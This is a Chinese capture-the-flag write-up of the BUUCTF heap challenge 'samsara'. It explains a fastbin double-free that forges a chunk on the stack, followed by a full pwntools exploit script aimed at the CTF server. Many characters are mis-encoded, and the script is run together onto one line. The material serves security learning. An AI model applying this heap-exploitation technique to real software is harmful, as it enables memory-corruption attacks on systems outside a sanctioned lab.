終于學(xué)到堆了，這道題做了三遍才來(lái)寫(xiě)這篇博客，算是對(duì)題有了較深地體會(huì)吧。

堆題的變量確實(shí)比棧題要多啊。

觀(guān)察各個(gè)case部分：

思路

1.先malloc chunk0，1，2。先利用double free漏洞連續(xù)free兩個(gè)chunk 0，1，形成閉環(huán)

2.malloc 一個(gè)chunk，雖然是chunk 3 ，但由于閉環(huán)的關(guān)系，會(huì)把編號(hào)為0 的chunk地址給chunk 3，此時(shí)閉環(huán)狀態(tài)為：

3.從棧上偽造chunk

觀(guān)察源代碼，只要把v8得值改成3735928559即可。這時(shí)可以把下圖棧上的變量區(qū)想象成偽造的chunk。

4.鏈接chunk 3 和偽造的chunk

只要修改chunk 3的fd，使其指向上圖prevsize所在地址，就能把chunk 3 和棧鏈接在一起。
chunk 3 的fd如何更改？在源代碼的case 3部分，修改Ingredient就等于修改fd，因?yàn)閙alloc 一個(gè)chunk，返回地就是fd，所以一開(kāi)始保存chunk的數(shù)組就是保存fd地址。（另外，free也是free的fd，但是一個(gè)chunk要鏈接另一個(gè)chunk，指向的必須是下一個(gè)chunk的prevsize地址。）
此時(shí)，閉環(huán)改變了：

5.修改偽造chunk

要修改偽造的chunk內(nèi)容，必須把它從fastbin中提取出來(lái)。前面有兩個(gè)chunk在排隊(duì)，所以一共要malloc 3次。
此時(shí)，偽造的chunk編號(hào)是6。只要把chunk 6的內(nèi)容修改成3735928559就可以了。

代碼

from pwn import * #context.log_level="debug" #p=process("./samsara") p=remote("node4.buuoj.cn",28335) def add():p.sendlineafter(">","1")def delete(index):p.sendlineafter(">","2")p.sendlineafter(":\n",index)def edit(index,content):p.sendlineafter(">","3")p.sendlineafter(":\n",index)p.sendlineafter(":\n",content)def show():p.sendlineafter(">","4")p.recvuntil("0x")return int(p.recvuntil("\n"),16) def edit_lair(value):p.sendlineafter(">","5")p.sendlineafter("?\n",value)add() #chunk 0 add() #chunk 1 add() #chunk 2delete("0") delete("1") delete("0")add() #chunk 3 edit_lair(str(0x20)) #v7=0x20edit("3",str(show()-0x8)) add() #chunk 4 add() #chunk 5 add() #chunk 6edit("6",str(3735928559))p.sendline("6")p.interactive()

干飯干飯！

總結(jié)

以上是生活随笔為你收集整理的BUUCTF刷题——metasequoia_2020_samsara的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。